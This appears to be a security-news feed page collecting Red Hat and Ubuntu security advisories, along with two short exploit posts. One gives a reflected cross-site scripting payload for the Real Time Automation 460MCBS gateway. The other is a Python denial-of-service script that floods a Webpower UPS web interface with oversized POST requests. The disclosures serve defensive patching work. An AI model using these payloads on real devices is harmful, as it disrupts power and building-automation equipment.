Red Hat Security Advisory 2023-1174-01 - OpenShift API for Data Protection (OADP) 1.1.2 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift API for Data Protection (OADP) 1.1.2 security and bug fix update  
Advisory ID:       RHSA-2023:1174-01  
Product:           OpenShift API for Data Protection  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1174  
Issue date:        2023-03-09  
CVE Names:         CVE-2021-46848 CVE-2022-1122 CVE-2022-1304   
                   CVE-2022-2056 CVE-2022-2057 CVE-2022-2058   
                   CVE-2022-2519 CVE-2022-2520 CVE-2022-2521   
                   CVE-2022-2867 CVE-2022-2868 CVE-2022-2869   
                   CVE-2022-2879 CVE-2022-2880 CVE-2022-2953   
                   CVE-2022-4415 CVE-2022-4883 CVE-2022-22624   
                   CVE-2022-22628 CVE-2022-22629 CVE-2022-22662   
                   CVE-2022-25308 CVE-2022-25309 CVE-2022-25310   
                   CVE-2022-26700 CVE-2022-26709 CVE-2022-26710   
                   CVE-2022-26716 CVE-2022-26717 CVE-2022-26719   
                   CVE-2022-27404 CVE-2022-27405 CVE-2022-27406   
                   CVE-2022-30293 CVE-2022-35737 CVE-2022-40303   
                   CVE-2022-40304 CVE-2022-41715 CVE-2022-41717   
                   CVE-2022-42010 CVE-2022-42011 CVE-2022-42012   
                   CVE-2022-42898 CVE-2022-43680 CVE-2022-44617   
                   CVE-2022-46285 CVE-2022-47629 CVE-2022-48303   
=====================================================================

1. Summary:

OpenShift API for Data Protection (OADP) 1.1.2 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

OpenShift API for Data Protection (OADP) enables you to back up and restore  
application resources, persistent volume data, and internal container  
images to external backup storage. OADP enables both file system-based and  
snapshot-based backups for persistent volumes.

Security Fix(es) from Bugzilla:

* golang: archive/tar: unbounded memory consumption when reading headers  
(CVE-2022-2879)

* golang: net/http/httputil: ReverseProxy should not forward unparseable  
query parameters (CVE-2022-2880)

* golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, and other related information, refer to the CVE page(s) listed in  
the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers  
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OADP-1056 - DPA fails validation if multiple BSLs have the same provider  
OADP-1150 - Handle docker env config changes in the oadp-operator  
OADP-1217 - update velero + restic to 1.9.5  
OADP-1256 - Backup stays in progress status after restic pod is restarted due to OOM killed  
OADP-1289 - Restore partially fails with error "Secrets \"deployer-token-rrjqx\" not found"  
OADP-290 - Remove creation/usage of velero-privileged SCC

6. References:

https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-1122  
https://access.redhat.com/security/cve/CVE-2022-1304  
https://access.redhat.com/security/cve/CVE-2022-2056  
https://access.redhat.com/security/cve/CVE-2022-2057  
https://access.redhat.com/security/cve/CVE-2022-2058  
https://access.redhat.com/security/cve/CVE-2022-2519  
https://access.redhat.com/security/cve/CVE-2022-2520  
https://access.redhat.com/security/cve/CVE-2022-2521  
https://access.redhat.com/security/cve/CVE-2022-2867  
https://access.redhat.com/security/cve/CVE-2022-2868  
https://access.redhat.com/security/cve/CVE-2022-2869  
https://access.redhat.com/security/cve/CVE-2022-2879  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-2953  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-4883  
https://access.redhat.com/security/cve/CVE-2022-22624  
https://access.redhat.com/security/cve/CVE-2022-22628  
https://access.redhat.com/security/cve/CVE-2022-22629  
https://access.redhat.com/security/cve/CVE-2022-22662  
https://access.redhat.com/security/cve/CVE-2022-25308  
https://access.redhat.com/security/cve/CVE-2022-25309  
https://access.redhat.com/security/cve/CVE-2022-25310  
https://access.redhat.com/security/cve/CVE-2022-26700  
https://access.redhat.com/security/cve/CVE-2022-26709  
https://access.redhat.com/security/cve/CVE-2022-26710  
https://access.redhat.com/security/cve/CVE-2022-26716  
https://access.redhat.com/security/cve/CVE-2022-26717  
https://access.redhat.com/security/cve/CVE-2022-26719  
https://access.redhat.com/security/cve/CVE-2022-27404  
https://access.redhat.com/security/cve/CVE-2022-27405  
https://access.redhat.com/security/cve/CVE-2022-27406  
https://access.redhat.com/security/cve/CVE-2022-30293  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-42010  
https://access.redhat.com/security/cve/CVE-2022-42011  
https://access.redhat.com/security/cve/CVE-2022-42012  
https://access.redhat.com/security/cve/CVE-2022-42898  
https://access.redhat.com/security/cve/CVE-2022-43680  
https://access.redhat.com/security/cve/CVE-2022-44617  
https://access.redhat.com/security/cve/CVE-2022-46285  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIUAwUBZAk/3dzjgjWX9erEAQgKPg/3Ri4q2NpruiiTlkWhpwy+dG0BuwSIKfuL  
kmzLCcLLAQlCsEi31S3qtFbcBl5IK4JAPRMXtN7egvfjbKorCzwPGp/IolN9FJqc  
SEEJ51mMBxLEPWjkuKH2Cad0QrefcaslXzGxJiUw1IngilOxhNFyniDhrr3dUdPo  
hvwuozHmVLVKimJ1GNpX4PWPO5flQ81LnIT2kJdhlQWYDjVZ1SLPvfyxI6WxxVl8  
PceMlXGzhhSJJ0G35jGq5p96JCtwX+75gYwkuYjkPqqIUElfpRKBvrXwt+Ci6baH  
hg8/Jp3Hdm3YitqDjsmysRxUkfv2ufuxIsgWfMYK3duo5mJQJWEVJ5S1C/2TOgPC  
QNhwk2VeWHFVSojudGUH9kqrV3wT+BHK1XReKjV8++yLZIbDy5ywH/dOjbA4RAkh  
vdQVc8xOGqgAsSN3DkjH7LWS86qktibW+Tm+h5c8HyRrOajwKeP67to2GfnRPva5  
1TNAhR0eDqy1HQ/SgE6Hkx1f2sSjfT0dpnEIMZD2+Cmp64bFlm5KoZNXLmUlTmhu  
vtDQtamhHlotPGV8znjMGbxpucpkzvGbTUPF1dQZo7xJP+Z8GedJLStvPhtTvN1T  
JaZ5PvPR9HVmjWOWpxsIll7xwx/wwfclRWH02hZj4eiNhjCnPQFWenAOfNCgus8D  
4jA0TFXFMA==  
=24ND  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1174-01

Ubuntu Security Notice 5938-1 - It was discovered that the Upper Level Protocol subsystem in the Linux kernel did not properly handle sockets entering the LISTEN state in certain protocols, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Davide Ornaghi discovered that the netfilter subsystem in the Linux kernel did not properly handle VLAN headers in some situations. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5938-1  
March 08, 2023

linux-gkeop vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that the Upper Level Protocol (ULP) subsystem in the  
Linux kernel did not properly handle sockets entering the LISTEN state in  
certain protocols, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0461)

Davide Ornaghi discovered that the netfilter subsystem in the Linux kernel  
did not properly handle VLAN headers in some situations. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-0179)

It was discovered that the NVMe driver in the Linux kernel did not properly  
handle reset events in some situations. A local attacker could use this to  
cause a denial of service (system crash). (CVE-2022-3169)

Maxim Levitsky discovered that the KVM nested virtualization (SVM)  
implementation for AMD processors in the Linux kernel did not properly  
handle nested shutdown execution. An attacker in a guest vm could use this  
to cause a denial of service (host kernel crash) (CVE-2022-3344)

Gwangun Jung discovered a race condition in the IPv4 implementation in the  
Linux kernel when deleting multipath routes, resulting in an out-of-bounds  
read. An attacker could use this to cause a denial of service (system  
crash) or possibly expose sensitive information (kernel memory).  
(CVE-2022-3435)

It was discovered that a race condition existed in the Kernel Connection  
Multiplexor (KCM) socket implementation in the Linux kernel when releasing  
sockets in certain situations. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-3521)

It was discovered that the Netronome Ethernet driver in the Linux kernel  
contained a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3545)

It was discovered that the Intel i915 graphics driver in the Linux kernel  
did not perform a GPU TLB flush in some situations. A local attacker could  
use this to cause a denial of service or possibly execute arbitrary code.  
(CVE-2022-4139)

It was discovered that a race condition existed in the Xen network backend  
driver in the Linux kernel when handling dropped packets in certain  
circumstances. An attacker could use this to cause a denial of service  
(kernel deadlock). (CVE-2022-42328, CVE-2022-42329)

It was discovered that the NFSD implementation in the Linux kernel  
contained a use-after-free vulnerability. A remote attacker could possibly  
use this to cause a denial of service (system crash) or execute arbitrary  
code. (CVE-2022-4379)

It was discovered that a race condition existed in the x86 KVM subsystem  
implementation in the Linux kernel when nested virtualization and the TDP  
MMU are enabled. An attacker in a guest vm could use this to cause a denial  
of service (host OS crash). (CVE-2022-45869)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate the number of channels, leading to an out-of-bounds  
write vulnerability. An attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code. (CVE-2022-47518)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate specific attributes, leading to an out-of-bounds  
write vulnerability. An attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code. (CVE-2022-47519)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate offsets, leading to an out-of-bounds read  
vulnerability. An attacker could use this to cause a denial of service  
(system crash). (CVE-2022-47520)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate specific attributes, leading to a heap-based buffer  
overflow. An attacker could use this to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2022-47521)

Lin Ma discovered a race condition in the io_uring subsystem in the Linux  
kernel, leading to a null pointer dereference vulnerability. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0468)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1016-gkeop   5.15.0-1016.21  
   linux-image-gkeop               5.15.0.1016.15  
   linux-image-gkeop-5.15          5.15.0.1016.15

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5938-1  
   CVE-2022-3169, CVE-2022-3344, CVE-2022-3435, CVE-2022-3521,  
   CVE-2022-3545, CVE-2022-4139, CVE-2022-42328, CVE-2022-42329,  
   CVE-2022-4379, CVE-2022-45869, CVE-2022-47518, CVE-2022-47519,  
   CVE-2022-47520, CVE-2022-47521, CVE-2023-0179, CVE-2023-0461,  
   CVE-2023-0468

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1016.21

Ubuntu Security Notice USN-5938-1

Red Hat Security Advisory 2023-0931-01 - Update information for Logging Subsystem 5.4.12 in Red Hat OpenShift. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem 5.4.12 - Red Hat OpenShift  
Advisory ID:       RHSA-2023:0931-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0931  
Issue date:        2023-03-08  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2022-4415   
                   CVE-2022-40897 CVE-2022-41717 CVE-2022-45061   
                   CVE-2022-48303   
=====================================================================

1. Summary:

Logging Subsystem 5.4.12 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.4.12 - Red Hat OpenShift

Security Fix(es):

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAkjzdzjgjWX9erEAQi7PA//YE7lj6Ryur2gPuSpmcloAyImtvakNJUr  
WAxUTc3Gtz0mvIRPF5YG5BMALEcAWFKmqGDw53b8MjwqEvV+Swh8KtrBQwlrtmtj  
/fMzAAfEDaN+4DfYJK8wMLGcaVz0ZijvVV8w1ymsxmKDtvtQ23dLztdLqIBzyGgu  
l6olgtO5roLrxM5RULhzOS3VIRP8CKiWzC+nlQxDkFpugDGGUQzcghschHMBM2Vr  
6cXZQPx9Q/8D/0aTaacC+QiVXKo9+/t71WC4XFgzzT4E3C0y1L2RKQgImKEyjFVr  
Lcvd15PcFisgTkSaSbYVoqiOwr0ioJ+zU5rhJakecCf+tTkjidVklPXWKHoWnVNA  
lBjcJ1mwHT+q5ynwMWrC+7rZi/Z51Ncj5swbcXrxD3AL89S57LOweaHy5en2ji08  
F2TUPdBz+FkcirdIbFKKwCee7JWL3JIV4x945t2Par2xhEOW9c0lMQoY12/Md7aL  
kvPbrx6gP/iXYVGZMk0ADFWAkeRdOcOr5VNEZT5eCyJ4MWdDtoslETE2Xzw42/Ue  
fhhDSPIGKp4ZsccfZf4YHGeARBboL/0i4VPBbOXzXic38vuB8qwPI7Ex12Xc8ZBT  
BYyPWhB3xVm8WwqwrFloZ5csk6QlvZirgkVYQBvYN6BR4985/++zs3p7XY3vk0da  
Sphu1dy+szA=  
=Hbxe  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0931-01

Real Time Automation 460MCBS version 5.2.14 suffers from a cross site scripting vulnerability.

    Exploit Title:  Real Time Automation 460MCBS Cross Site Scripting (XSS)Date: 2023-03-09Exploit Author: Yehia ElghalyVendor Homepage: https://www.rtautomation.com/Software Link: https://www.rtautomation.com/product/460mcbs/Version: Revision 5.2.14Tested on: Real Time Automation CVE: N/ASummary: The Real Time Automation  460MCBS moves data between up to 32 Modbus TCP Servers and a BACnet/IP Building Automation System (BAS). It’s a perfect tool to tie Modbus TCP power meters, boilers, chillers and other devices into your BACnet/IP Building Automation SystemDescription: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: XSS found on when insert a payload after(/)Payload: ?c12yy<script>alert('XSSYF')</script>p1ax8=1[Affected Component](/)

Real Time Automation 460MCBS 5.2.14 Cross Site Scripting

Webpower UPS version 5.53 suffers from an HTTP denial of service vulnerability.

    # Exploit Title: Webpower UPS v5.53 HTTP Denial of Service# Date: 2023-03-09# Exploit Author: Yehia Elghaly# Vendor Homepage: https://www.eaton.com/ae/en-gb.html# Software Link: https://www.eaton.com/ae/en-gb.html# Version: Revision v5.53# Tested on: WebPower UPS# CVE: N/A#!/usr/bin/env python# Webpower UPS v5.53 HTTP Denial of Service.# Discovered BY (Yehia Elghaly)import requestsurl = 'IP_Address'data = {'Long_string' : 'a' * 12200}# 19700-character patternfor i in range (16):  response = requests.post(url, data=data)  print("Response {}: {}".format(i+1, response.status_code))  print "crach"

Webpower UPS 5.53 Denial Of Service

Red Hat Security Advisory 2023-1006-01 - This release of Red Hat build of Quarkus 2.7.7 includes security updates, bug fixes, and enhancements. For more information, see the release notes page listed in the References section. Issues addressed include code execution, denial of service, deserialization, information leakage, memory leak, and remote SQL injection vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat build of Quarkus 2.7.7 release and security update  
Advisory ID:       RHSA-2023:1006-01  
Product:           Red Hat build of Quarkus  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1006  
Issue date:        2023-03-08  
CVE Names:         CVE-2022-1471 CVE-2022-3171 CVE-2022-31197   
                   CVE-2022-41946 CVE-2022-41966 CVE-2022-42003   
                   CVE-2022-42004 CVE-2022-42889 CVE-2023-0044   
=====================================================================

1. Summary:

An update is now available for Red Hat build of Quarkus. Red Hat Product  
Security has rated this update as having a security impact of Important. A  
Common Vulnerability Scoring System (CVSS) base score, which gives a  
detailed severity rating, is available for each vulnerability. For more  
information, see the CVE links in the References section.

2. Description:

This release of Red Hat build of Quarkus 2.7.7 includes security updates,  
bug  
fixes, and enhancements. For more information, see the release notes page  
listed  
in the References section.

Security Fix(es):

*CVE-2023-0044 quarkus-vertx-http: a cross-site attack may be initiated  
which might lead to the Information Disclosure [quarkus-2]

*CVE-2022-41946 jdbc-postgresql: postgresql-jdbc:  
PreparedStatement.setText(int, InputStream) will create a temporary file if  
the InputStream is larger than 2k [quarkus-2]

*CVE-2022-31197 postgresql: SQL Injection in ResultSet.refreshRow() with  
malicious column names [quarkus-2.7]

*CVE-2022-42004 jackson-databind: use of deeply nested arrays [quarkus-2.7]

*CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt  
UNWRAP_SINGLE_VALUE_ARRAYS [quarkus-2.7]

*CVE-2022-42889 commons-text: apache-commons-text: variable interpolation  
RCE [quarkus-2.7]

*CVE-2022-1471 snakeyaml: Constructor Deserialization Remote Code Execution  
[quarkus-2]

*CVE-2022-41966 xstream: Denial of Service by injecting recursive  
collections or maps based on element's hash values raising a stack overflow  
[quarkus-2.7]

*CVE-2022-3171 protobuf-java: timeout in parser leads to DoS [quarkus-2]

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2129428 - CVE-2022-31197 postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names  
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS  
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays  
2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE  
2137645 - CVE-2022-3171 protobuf-java: timeout in parser leads to DoS  
2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution  
2153399 - CVE-2022-41946 postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions  
2158081 - CVE-2023-0044 quarkus-vertx-http: a cross-site attack may be initiated which might lead to the Information Disclosure  
2170431 - CVE-2022-41966 xstream: Denial of Service by injecting recursive collections or maps based on element's hash values raising a stack overflow

5. JIRA issues fixed (https://issues.jboss.org/):

QUARKUS-2593 - qpid extension, geronimo-jms_2.0_spec artifacts are not included in maven repo zip  
QUARKUS-2705 - Old graal-sdk and nativeimage svm comparing to builder image  
QUARKUS-2852 - JReleaser - Specific configuration for maintenance and preview  
QUARKUS-2854 - Fix memory leak in Agroal local connection cache for Netty's FastThreadLocalThread  
QUARKUS-2855 - Allow CORS same origin requests  
QUARKUS-2856 - Handle maintenance releases in release-cli.sh  
QUARKUS-2861 - Complete implementation of UriInfoImpl  
QUARKUS-2862 - Prevent duplicate HTTP headers when WriterInterceptor is used  
QUARKUS-2864 - Fix how certificates are obtained in the RestClient integration tests  
QUARKUS-2865 - Remove wrong LANG from dockerfile use parent default  
QUARKUS-2866 - Delay initialization of the DefaultChannelId class at runtime  
QUARKUS-2867 - Strip debug information from the native executable unconditionally  
QUARKUS-2869 - Use proper HttpHeaders FQCN  
QUARKUS-2871 - Properly ensure that transfer-encoding is not set when content-length exists  
QUARKUS-2872 - Properly initialize elements from the datasource configs  
QUARKUS-2873 - Attempt to fix podman DNS issue  
QUARKUS-2874 - Clear out OutputStream when a MessageBodyWriter throws an exception  
QUARKUS-2876 - Allow to override the Oracle JDBC metadata for native images also on Windows  
QUARKUS-2877 - Move excludes for jaeger-thrift to the bom  
QUARKUS-2879 - Fix some typos in Maven tooling doc  
QUARKUS-2880 - Ensure that File is properly handled in native mode in RESTEasy Reactive  
QUARKUS-2882 - Ensure that @WithConverter values work in native mode  
QUARKUS-2883 - Provide actionable error message when unable to bind to Unix domain socket  
QUARKUS-2884 - Fix the error for non-blocking multipart endpoints  
QUARKUS-2885 - List Reactive Oracle Client in Hibernate Reactive guide  
QUARKUS-2886 - Fix null query parameter handling in generated RestEasy Reactive clients  
QUARKUS-2887 - Podman on Windows needs one /, not two // prefix  
QUARKUS-2888 - Allow updating docs for older branches  
QUARKUS-2889 - [Guide] fix reactive-sql-clients startup method  
QUARKUS-2893 - Normalize uri template name to be a valid regex groupname  
QUARKUS-2895 - Support arrays in RESTEasy Reactive Resource methods

6. References:

https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-3171  
https://access.redhat.com/security/cve/CVE-2022-31197  
https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/cve/CVE-2022-41966  
https://access.redhat.com/security/cve/CVE-2022-42003  
https://access.redhat.com/security/cve/CVE-2022-42004  
https://access.redhat.com/security/cve/CVE-2022-42889  
https://access.redhat.com/security/cve/CVE-2023-0044  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/articles/4966181  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=redhat.quarkus&version=2.7.7

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAkjydzjgjWX9erEAQjAvg//RwyYoQzWldCKwxRruyVYzW8TRSBdtc5u  
LU27GdLH7L+S7AcOEYnuypuBPswHBIP5Q9dbAhqyOOyuFv8EdorD5dHI22IZcMmp  
FFvAb+HJ5Eeanl2GEv3/rDPa6pm6e7yc95uqM4MW1a4jvGDqnOJLvhvrGa3TnoXw  
dEXGe9w66GghUoXb+ZUk65i7rMSfsDcXqtgxThYcXqsa/Aw7Qduny5dkGxsTy1Hv  
9uT4Ru+hJA8lHxKFiB5Wpa8xs9kSaV0rlRatm7fxkOREI7oJN0L9UHLu6cgnY2sd  
YPrs3utt7WIDUhwZ9CCaPxUIdSXZUv3pvh1PHeeul0eqRbdJz32qDZth85suNHap  
tiLpu97q1TD8BVUMVFD5bh92cRfY5v3rnXfoNBS2rc7rWHiNuEwgsmli5qLGuCjv  
39y16DTP4/8lDKYysSk5lMM4Nc88auRKy15g38TRWTPdqcHe1EtHBvKiL293u4g1  
x7mfm+r/+ZaZ+fIEJjOIHHEHsTyR5wjrCJJLIN8/ZBA+paIFkBc1nhZ4GsgnRI56  
mAK+Br2lCTWFOHPoaCfJlLbrc6Vath3mgAWgmS5E2ewyR9Unqk+0GBg9O37Tut5O  
+nnR12f3nqWAUyDIe2+9reJ7c5Fyd90Eb0L1Dr2iYflIEmA/peHDK/dM37RoIhyf  
SCyzvVeZWmA=  
=UMCw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1006-01

Red Hat Security Advisory 2023-0932-01 - Update information for Logging Subsystem 5.6.3 in Red Hat OpenShift. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem 5.6.3 - Red Hat OpenShift  
Advisory ID:       RHSA-2023:0932-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0932  
Issue date:        2023-03-08  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2022-2873   
                   CVE-2022-4415 CVE-2022-24999 CVE-2022-40897   
                   CVE-2022-41222 CVE-2022-41717 CVE-2022-43945   
                   CVE-2022-45061 CVE-2022-48303   
=====================================================================

1. Summary:

Logging Subsystem 5.6.3 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.6.3 - Red Hat OpenShift

Security Fix(es):

* express: "qs" prototype poisoning causes the hang of the node process  
(CVE-2022-24999)

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2150323 - CVE-2022-24999 express: "qs" prototype poisoning causes the hang of the node process  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-3717 - [release-5.6] Store tenant.yaml in secret instead of configmap  
LOG-3729 - [release-5.6] /var/log/oauth-server/audit.log not being scraped by log collector

6. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-2873  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-24999  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-41222  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-43945  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAkjxtzjgjWX9erEAQjtcQ/+Ks/8FFYh3j3tgpUXlIJOGTwpRtXOgrnj  
maxtiWT24K/akjZ1XQKmUS1Bie4aDnW/2emBWDoFDoIYZ3E7fgEAUTSyp1uLzau+  
i6+ZRQsrusMamh6+TA1BcW5IRJ0xw9A/ssU6xYipt0dweVV1P0MQfCXrU8MdjMM1  
sJph4xDtCTTkYx+pJvERHHLkPXWrqD4NejRFJidfvKL2VBx6wRcz3BCDie2F3Wbc  
thuUGdoOaWldGCAtwJA73Bhwxn5AiHfetXaa4DjNpAUfmWhzkztpgptI5B6NoI0E  
0JjIhvKu3ABFaSgx8FNTU5F0PENReFknLHICwykM/1HUITJD6vsyBbNwdqJKUOT3  
mPneC3iZlFh7uIXmWL2pB36VijoYnboQ4b8/PEPDwig54P7MdsPwp0B7uSInDZWa  
folHil8eSORnO6tC46aVnQIMWB+JG6l5P0V/72exZn3L4T5668evG7QbFIIT4foU  
